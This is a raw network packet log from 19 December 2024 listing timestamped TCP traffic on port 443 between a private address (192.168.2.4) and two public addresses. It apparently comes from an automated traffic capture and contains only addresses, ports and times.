                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.674335003 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.674726009 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.675436020 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.675793886 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.675825119 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.676054955 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677007914 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677227020 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677280903 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677308083 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677460909 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677495003 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677515984 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677572012 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677581072 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677606106 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677624941 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677634954 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.677864075 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680411100 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680432081 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680493116 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680501938 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680660009 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.680660009 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.682956934 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.682995081 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.683024883 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.683032036 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.683053970 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.685957909 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.685980082 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686019897 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686039925 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686053038 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686709881 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686758041 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686765909 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.686806917 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.688224077 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.688301086 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.688308001 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.689186096 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.689234972 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.689243078 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.689284086 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.690018892 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.690071106 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.691284895 CET44349777104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.691606998 CET49777443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.691629887 CET44349777104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.692424059 CET44349776104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.692512035 CET44349777104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.692565918 CET49777443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.692692041 CET49776443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.692728996 CET44349776104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.693451881 CET49777443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.693507910 CET44349777104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.693629980 CET44349776104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.693680048 CET49776443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695545912 CET49776443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695602894 CET44349776104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695848942 CET49777443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695856094 CET44349777104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695976019 CET49776443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.695985079 CET44349776104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.709058046 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.717461109 CET44349778104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.717782974 CET49778443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.717798948 CET44349778104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.718672037 CET44349778104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.718722105 CET49778443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.719337940 CET49778443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.719341993 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.719393969 CET44349778104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.719618082 CET49778443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.719626904 CET44349778104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724116087 CET44349779104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724416018 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724426031 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724455118 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724713087 CET49779443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.724734068 CET44349779104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.725287914 CET44349779104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.726134062 CET49779443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.726231098 CET44349779104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.726502895 CET49779443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.726537943 CET44349779104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.741400957 CET49777443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.741401911 CET49776443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.769956112 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.770071030 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.770112991 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.771377087 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.772164106 CET49778443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.777740955 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.777812004 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.777834892 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.785171986 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.785228014 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.785249949 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.792617083 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.792691946 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.792715073 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.807514906 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.807554007 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.807590008 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.807612896 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.807651043 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.814907074 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.819899082 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.819936037 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.822040081 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.822118044 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.822151899 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.829099894 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.829170942 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.829204082 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.836338043 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.836553097 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.836584091 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843229055 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843297958 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843324900 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843753099 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843835115 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843873024 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843933105 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.843980074 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.844309092 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.844327927 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.850331068 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.850389957 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.850402117 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.850418091 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.850461006 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.853024006 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.853077888 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.853144884 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.853324890 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.853349924 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.854536057 CET49784443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.854557991 CET44349784104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.857989073 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.858062029 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.859955072 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.860028982 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.860047102 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.860054970 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.860088110 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.860102892 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.861865044 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.861932039 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.861989975 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862443924 CET49785443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862457991 CET44349785104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862905979 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862936974 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862971067 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.862979889 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.863013029 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.863038063 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.865215063 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.865257025 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.865282059 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.865288973 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.865319014 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.868561029 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.868588924 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.868626118 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.868640900 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.868666887 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.871424913 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.871450901 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.871500969 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.871511936 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.871537924 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.874584913 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.874614954 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.874649048 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.874656916 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.874689102 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.878134966 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.878165007 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.878195047 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.878205061 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.878243923 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.881093025 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.881128073 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.881158113 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.881165981 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.881196022 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.912734985 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.913448095 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.913481951 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.916265011 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.916327953 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.916997910 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.917135954 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.917220116 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.917231083 CET44349781104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.927460909 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.958022118 CET49781443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.997033119 CET44349782104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.997539043 CET49782443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.997574091 CET44349782104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.998836994 CET44349782104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.999578953 CET49782443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.999748945 CET49782443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.999756098 CET44349782104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:29.999824047 CET44349782104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051714897 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051759958 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051805973 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051837921 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051862001 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.051887035 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.052380085 CET49782443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054044008 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054068089 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054133892 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054141998 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054174900 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.054197073 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057264090 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057291031 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057341099 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057348967 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057374001 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.057394028 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060851097 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060885906 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060921907 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060929060 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060956001 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.060975075 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063591957 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063652992 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063688040 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063695908 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063723087 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.063743114 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.066970110 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.066999912 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.067040920 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.067049026 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.067074060 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.067091942 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070190907 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070219994 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070264101 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070285082 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070300102 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070337057 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070739031 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.070791960 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.074116945 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.074141026 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.074197054 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.074208021 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.074218035 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.115611076 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.124640942 CET44349774104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.125056982 CET44349774104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.125122070 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.126045942 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.126070976 CET44349774104.16.102.112192.168.2.4
